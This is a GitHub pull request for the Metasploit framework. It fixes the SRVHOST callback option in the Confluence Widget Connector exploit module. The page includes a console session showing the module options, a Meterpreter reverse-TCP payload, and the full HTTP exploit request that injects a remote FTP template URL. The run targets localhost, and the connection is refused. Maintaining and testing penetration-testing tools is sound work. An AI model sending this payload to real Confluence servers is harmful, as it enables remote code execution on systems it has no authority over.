Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Make SRVHOST the callback address in confluence_widget_connector #12013

Merged
merged 2 commits into from Jun 25, 2019

Conversation

Projects
None yet
2 participants
@wvu-r7
Copy link
Contributor

commented Jun 25, 2019

Fixes #12012. Please read that issue for repro.

Note that this also fixes the target_platform check: an empty string is returned, not nil.

msf5 exploit(multi/http/confluence_widget_connector) > run

[-] Exploit failed: The following options failed to validate: SRVHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/confluence_widget_connector) > options

Module options (exploit/multi/http/confluence_widget_connector):

   Name        Current Setting                              Required  Description
   ----        ---------------                              --------  -----------
   PASVPORT    0                                            no        The local PASV data port to listen on (0 is random)
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      127.0.0.1                                    yes       The target address range or CIDR identifier
   RPORT       8090                                         yes       The target port (TCP)
   SRVHOST                                                  yes       Callback address for template loading
   SRVPORT     8021                                         yes       The local port to listen on.
   SSL         false                                        no        Negotiate SSL for incoming connections
   SSLCert                                                  no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI   /                                            yes       The base to Confluence
   TRIGGERURL  https://www.youtube.com/watch?v=kxopViU98Xo  yes       Url to external video service to trigger vulnerability
   VHOST                                                    no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java


msf5 exploit(multi/http/confluence_widget_connector) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set httptrace true
httptrace => true
msf5 exploit(multi/http/confluence_widget_connector) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Starting the FTP server.
[*] Started service listener on 127.0.0.1:8021
********************
####################
# Request:
####################
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Origin: http://127.0.0.1:8090/
Content-Type: application/json; charset=UTF-8
Content-Length: 168

{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=kxopViU98Xo","_template":"ftp://127.0.0.1:8021/lHmYHjavaprop.vm"}}}
[-] The connection was refused by the remote host (127.0.0.1:8090).
[!] Connection timed out in #inject_template
[-] Exploit aborted due to failure: unreachable: Target did not respond to OS check.  Confirm RHOSTS and RPORT, then run "check".
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/confluence_widget_connector) >

@wvu-r7 wvu-r7 requested a review from asoto-r7 Jun 25, 2019

@wvu-r7 wvu-r7 added the easy label Jun 25, 2019

@asoto-r7 asoto-r7 self-assigned this Jun 25, 2019

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

Tested both original and revised versions. Both the check and exploit methods work great. Thanks for knocking this one out! 👍

@asoto-r7 asoto-r7 merged commit 5c14aea into rapid7:master Jun 25, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

asoto-r7 added a commit that referenced this pull request Jun 25, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 25, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented Jun 25, 2019

You rock. Thanks for handling this so quickly!

@wvu-r7 wvu-r7 deleted the wvu-r7:bug/confluence branch Jun 25, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.